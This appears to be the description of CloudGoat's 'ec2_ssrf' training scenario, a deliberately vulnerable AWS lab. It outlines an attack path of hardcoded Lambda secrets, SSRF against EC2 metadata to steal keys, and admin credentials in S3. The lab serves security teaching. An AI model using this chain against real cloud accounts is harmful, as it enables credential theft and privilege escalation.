Size: Medium
Difficulty: Moderate
Command: $ ./cloudgoat.py create ec2_ssrf
- 1 VPC with:
- EC2 x 1
- 1 Lambda Function
- 1 S3 Bucket
- IAM User "Solus"
Invoke the "cg-lambda-[ CloudGoat ID ]" Lambda function.
Starting as the IAM user Solus, the attacker discovers they have ReadOnly permissions to a Lambda function, where hardcoded secrets lead them to an EC2 instance running a web application that is vulnerable to server-side request forgery (SSRF). After exploiting the vulnerable app and acquiring keys from the EC2 metadata service, the attacker gains access to a private S3 bucket with a set of keys that allow them to invoke the Lambda function and complete the scenario.
- As the IAM user Solus, the attacker explores the AWS environment and discovers they can list Lambda functions in the account.
- Within a Lambda function, the attacker finds AWS access keys belonging to a different user - the IAM user Wrex.
- Now operating as Wrex, the attacker discovers an EC2 instance running a web application vulnerable to a SSRF vulnerability.
- Exploiting the SSRF vulnerability via the
?url=...parameter, the attacker is able to steal AWS keys from the EC2 metadata service. - Now using the keys from the EC2 instance, the attacker finds a private S3 bucket containing another set of AWS credentials for a more powerful user: Shepard.
- Now operating as Shepard, with full-admin final privileges, the attacker can invoke the original Lambda function to complete the scenario.
A cheat sheet for this route is available here.